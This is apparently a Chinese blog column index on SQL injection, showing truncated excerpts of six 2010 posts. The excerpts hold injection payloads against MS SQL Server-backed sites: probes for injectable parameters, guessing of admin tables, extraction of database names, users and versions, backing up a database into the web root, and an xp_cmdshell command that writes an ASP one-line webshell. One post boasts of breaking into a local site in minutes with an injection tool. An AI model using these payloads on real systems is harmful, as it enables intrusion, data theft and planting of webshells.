SQL注入
关注
分享
扫一扫
iteye_3856
这个作者很懒,什么都没留下…
展开
专栏收录文章
- 默认排序
- 最新发布
- 最早发布
- 最多阅读
- 最少阅读
-
SQL注入语句 (很全)
1、返回的是连接的数据库名 and db_name()>0 2、作用是获取连接用户名 and user>0 3、将数据库备份到Web目录下面 ;backup database 数据库名 to disk='c:\inetpub\wwwroot\1.db';-- 4、显示SQL系统版本 and 1=(select @@VERSION) 或and 1=convert(int,@@versi...原创 2010-06-17 13:55:36 · 240 阅读 · 0 评论 -
标准SQL注入入侵语句
1.判断有无注入点 ; and 1=1 and 1=2 2.猜表一般的表的名称无非是admin adminuser user pass password 等.. and 0(select count(*) from *) and 0(select count(*) from admin) ---判断是否存在admin这张表 3.猜帐号数目 如果遇到0< 返回正确页面...原创 2010-06-17 13:58:20 · 111 阅读 · 0 评论 -
常用sql注入语句
检测可否注入 http://127.0.0.1/xx?id=11 and 1=1 (正常页面) http://127.0.0.1/xx?id=11 and 1=2 (出错页面) 检测表段的 http://127.0.0.1/xx?id=11 and exists (select * from admin) 检测字段的 http://127.0.0...原创 2010-06-17 13:59:41 · 317 阅读 · 0 评论 -
最详细的SQL注入语句相关的命令整理
1、 用^转义字符来写ASP(一句话木马)文件的方法: http://192.168.1.5/display.asp?keyno=1881;execmaster.dbo.xp_cmdshell 'echo ^execute request^("l"^)^ >c:\mu.asp';-- echo ^ >c:\mu.asp 2、 显示SQL系统版本: ...原创 2010-06-17 14:01:40 · 327 阅读 · 0 评论 -
利用SQL注入2分钟入侵网站全程实录
说起流光、溯雪、乱刀,可以说是大名鼎鼎无人不知无人不晓,这些都是小榕哥的作品。每次一提起小榕哥来,我的崇拜景仰就如滔滔江水,连绵不绝~~~~(又来了!) 让我们崇拜的小榕哥最新又发布了SQL注入工具,这回喜欢利用SQL注入入侵网站的黑友们有福了。小榕哥的工具就是强!偶用它来搞定我们本地的信息港,从寻找注入漏洞到注入攻击成功,通过准确计时,总共只用了3分还差40秒,呵呵,王者风范,就是强啊!不信吗?...原创 2010-06-17 14:23:49 · 145 阅读 · 0 评论 -
一句话判断数据库是否web和数据库分离
and exists(select * from admin where 1=(SELECT (case when host_name() =@@servername then 1 else 0 end))) 加在注入点后面,如果返回正常说明web和数据库是同一服务器,如果不正常责说明是分离的. 注意admin是数据库存在的一个表,自己找吧. ...原创 2010-06-21 15:09:32 · 224 阅读 · 0 评论